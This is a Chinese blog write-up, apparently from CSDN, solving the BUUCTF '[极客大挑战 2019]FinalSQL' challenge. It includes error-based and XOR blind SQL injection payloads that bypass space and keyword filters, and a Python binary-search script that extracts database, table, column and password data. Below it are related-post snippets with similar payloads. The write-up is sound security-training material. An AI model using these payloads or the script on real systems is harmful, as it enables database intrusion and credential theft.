[极客大挑战 2019]FinalSQL

最新推荐文章于 2024-02-23 21:33:47 发布
最新推荐文章于 2024-02-23 21:33:47 发布
阅读量918 收藏 1
点赞数
分类专栏: BUUCTF web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53314778/article/details/113791431
版权
web 同时被 2 个专栏收录
52 篇文章 0 订阅
订阅专栏
BUUCTF
46 篇文章 0 订阅
订阅专栏
本文详细记录了一次针对FinalSQL的盲注破解过程,通过使用extractvalue和updatexml进行报错注入,绕过空格和等号限制,逐步揭示了数据库名、表名和字段名。最终通过脚本盲注获取了敏感信息,包括用户名、密码及隐藏的flag。此案例展示了SQL注入攻击的复杂性和防御难度。
摘要由CSDN通过智能技术生成

[极客大挑战 2019]FinalSQL

考点

  • 盲注

启动
在这里插入图片描述
SQl的题目,首先试一试万能密码(虽然不可能,但是还是得试一下)在这里插入图片描述

试一下双写在这里插入图片描述

看来被封死了,想想其他的办法,可以使用extractvalue和updatexml进行报错注入,空格和=号没有,所以我们要使用()来代替空格,使用like来代替=号

使用extractvalue()
/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database()))))%23
在这里插入图片描述
看来是加强到最后一版本了,仔细查看它的提示
跟着他的流程走,点按钮在这里插入图片描述
让我们试试别的在这里插入图片描述告诉我们对了,但是不是这张表(埋坑)
假装怀疑一下是存在sql注入的,经过fuzz,发现过滤了空格,union之类的关键字
在这里插入图片描述‘没有被过滤,输入11回显’ERROR’,1^0回显’NO! Not this! Click others~~~’,判断出为数字型注入在这里插入图片描述
由于空格被过滤,用()代替。

1^(ord(substr((select(group_concat(schema_name))from(information_schema.schema ta)),%d,1))=%d)^1"%(i,ord(j)) 获取数据库名称

1^(ord(substr((select(group_concat(table_name))from(information_schema.tables) where(table_schema)='geek'),%d,1))=%d)^1"%(i,ord(j)) 获取数据库表名

1^(ord(substr((select(group_concat(column_name))from(information_schema.column s)where(table_name='F1naI1y')),%d,1))=%d)^1"%(i,ord(j))
获取数据库列名

脚本

import requests
import time

# url是随时更新的,具体的以做题时候的为准
url = 'http://8d08c7b6-e6f3-4df0-b71c-a2a397891bab.node3.buuoj.cn/search.php?id='
i = 0
flag = ''
while True:
    i += 1
    # 从可打印字符开始
    begin = 32
    end = 126
    tmp = (begin + end) // 2
    while begin < end:
        print(begin, tmp, end)
        time.sleep(0.1)
        # 爆数据库
        # payload = "''or(ascii(substr(database(),%d,1))>%d)" % (i, tmp)
        # 爆表
        # payload = "''or(ascii(substr((select(GROUP_CONCAT(TABLE_NAME))from(information_schema.tables)where(TABLE_SCHEMA=database())),%d,1))>%d)" % (i, tmp)
        # 爆字段
        # payload = "''or(ascii(substr((select(GROUP_CONCAT(COLUMN_NAME))from(information_schema.COLUMNS)where(TABLE_NAME='F1naI1y')),%d,1))>%d)" % (i, tmp)
        # 爆flag 要跑很久
        # payload = "''or(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" % (i, tmp)
        # 爆flag 很快
        payload = "''or(ascii(substr((select(password)from(F1naI1y)where(username='flag')),%d,1))>%d)" % (i, tmp)
        # 错误示例
        # payload = "''or(ascii(substr((select(GROUP_CONCAT(fl4gawsl))from(Flaaaaag)),%d,1))>%d)" % (i, tmp)

        r = requests.get(url+payload)
        if 'Click' in r.text:
            begin = tmp + 1
            tmp = (begin + end) // 2
        else:
            end = tmp
            tmp = (begin + end) // 2

    flag += chr(tmp)
    print(flag)
    if begin == 32:
        break

拿脚本盲注
以下是注入发现的信息

用户:root@localhost
数据库名:Click
表名:F1naI1y
字段名:id,username,password
	username:mygod,welcome,site,site,site,site,Syc,finally,flag
	password:cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{7c62a615-ec40-44c3-9253-516366f3a908} 

表名:Flaaaaag
字段名:id,fl4gawsl
无尽星河-深空
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[极客挑战 2019]FinalSQL - 异或盲注
oZuoShen123的博客
10-05 492
1、这题的关键是找注入点,如果选择用户名、密码作为输入点就麻烦了 2、注入点:按钮,点击就传id;当id=1时,提示Click others   可以利用id的特性,构造异或匹配   payload: f"1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{j},1))={i})^1"   payload有两个异或:1^表达式^1
buuctf [极客挑战 2019]FinalSQL
zoixsoadji的博客
03-30 718
进入题目,又是这个作者,试试万能密码 经过实验,双写什么的都没用。 作者说的神秘代码,点进去发现url变了 发现并没有什么卵用…… 正当我没有头绪的时候,我突然看到一句话,审题真的很重要: 盲注!这里附上大佬的脚本: import requests import time url = "http://def9937b-1746-4f41-98c7-a2b55b95664a.node4.buuoj.cn:81/search.php" temp = {"id" : ...
[极客挑战 2019]FinalSQL 1
plant1234的博客
04-30 1929
[极客挑战 2019]FinalSQL 1 首先打开题目,发现是一个sql注入: 寻找注入点发现注入点在: 发现是一个盲注,且过滤了and和空格等 并且直接盲注比较慢,还需要利用二分法来编写脚本 大佬脚本: import requests url = "http://b4d7330a-4880-41c4-a20c-3dae55d11c37.node4.buuoj.cn:81/search.php" flag = '' def payload(i, j): sql = "1^(ord(
[极客挑战 2019]FinalSQL wp
{OvEr}的博客
11-19 423
[极客挑战 2019]FinalSQL wp 终极sql注入了,考点是盲注(写脚本的那种இ௰இ) 打开网页是这样的。 那个红色的卡片,我们随便点进去看看,直接点最后一个吧。 通过url判断注入点是id。 接着做FUZZ测试,发现同样过滤了union、or、and、||、&等我们常用的关键字,但是没有过滤异或符号^。 当我们输入id=1^1时,回显"Error" 当我们输入id=1^0时,回显正常 接下来我们进行盲注,下面是大神的脚本 step 1爆数据库 import requests u
sql注入 [极客挑战 2019]FinalSQL1
最新发布
m0_75178803的博客
02-23 929
逻辑符号|会被检测到,而&感觉成了注释符,&之后的内容都被替换掉了。直接盲注比较慢,还需要利用二分法来编写脚本。这里直接令传入的id=6。传入id=1^1^1。这里利用到大佬的脚本。运行一下得到flag。
BUUCTF [极客挑战 2019]FinalSQL
qq_60829702的博客
10-21 1299
因为之前的几道盲注题目我都是直接看师傅的wp拿来用的,现在自己写一下发现果然光看不如去写。只有自己真正的去写了脚本才会发现一些东西永远都是看起来简单的一批,但是真正的让自己独立写出来还是有点难度的。毕竟那是别人的东西不是自己的东西,我们要把其他师傅的知识变成我们自己的。本人菜鸟一枚,虽然花了挺多时间写这个题目和wp的,但是收获到了很多东西,也希望我能坚持下来。
[极客挑战 2019]FinalSQL
zzqzzq11的博客
12-03 515
⽤之前的脚本,注意request库的get请求⽤的是param作为参数传递,⽽post⽤的是data。使⽤geek数据库获取表名,修改代码为:sql =使⽤F1nal1y表获取列名:sql =
[极客挑战 2019]FinalSQL1
azraelxuemo的博客
07-21 277
具体的思路网上也还有其他的,这里我就分享一个脚本 这个是爆数据名,表名,列名类推 import requests import time database_all = '' url = 'http://7023b2d9-28ff-48a1-b167-05f060adfc6e.node4.buuoj.cn/search.php?id=1' # 求出总长度的位数,比如说如果总长度为43,那么就是2位数 weishu = '' for i in range(1, 7): sql = "^(subst
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
BUUCTF web-[HCTF 2018]WarmUp
m0_53314778的博客
01-14 3961
[HCTF 2018]WarmUp 点进去一个滑稽,,查看源码 有个php,访问php 查看源码,有个hint.php访问一下 提示说flag在ffffllllaaaagggg文件里,我们继续分析源码 我们发现最底部的if语句为执行条件,有三个条件,第一个判断文件不能为空(检查是否传了file参数),第二这个传的参数是字符串,第三要过白名单检测,过了之后包含 隐藏了flag的文件。我们再看上面的if语句,白名单是hint.php,又有mb_strpos和mb_substr截取内容,碰到?就截止,所以我们只
2021-01-27
m0_53314778的博客
01-27 1577
MRCTF2020]你传你马呢 .htaccess文件简介: .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 打开apache的http.conf文件 找到的AllowOverride None,将其改为AllowOverride
BUUCTF web-[强网杯 2019]随便注
m0_53314778的博客
01-15 810
按流程走,首先初步判定是否存在sql注入(肯定存在了,我们假装判定一下) 输入 1’ or 1=1 #,得到 我们再依次尝试输入 1’ order by 1# 1’ order by 2# 1’ order by 3# 测字段数 到3 报错,字段数为2 尝试联合注入union,看能否查出字段 select被过滤,不能查。我们接着爆表 显示有两个表,为word 和 1919810931114514,表位数字串要记得加单引号`` 我们试着爆出两个表的内容 1’; show columns from wo
CTFHub技能树-web-RCE 知识点
m0_53314778的博客
01-11 800
知识点eval执行文件包含php://input以上总结命令注入1. 什么是RCE?什么是命令注入?2. 漏洞产生的原因3. 什么是ping命令Linux系统支持的管道符如下:管道符的替代 eval执行 打开网站显示如下代码: ?>php if (isset(KaTeX parse error: Expected '}', got 'EOF' at end of input: …])) { eval(_REQUEST[“cmd”]); } else { highlight_file(FILE)
极客挑战 2019]EasySQL
09-03
EasySQL极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要根据题目要求来编写 SQL 查询语句,从而得到正确的结果。这道题的目标是考察你对 SQL 查询语句的掌握程度和对数据库操作的理解。 在极客挑战 2019 中,EasySQL 是一个相对较简单的题目,旨在帮助参赛者熟悉 SQL 查询语句的基本使用和常见操作。通过解决这个问题,你将能够提高自己的 SQL 查询能力,并为更复杂的数据库操作打下基础。 如果你有关于 EasySQL 的具体问题,我可以帮助你更详细地解答。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值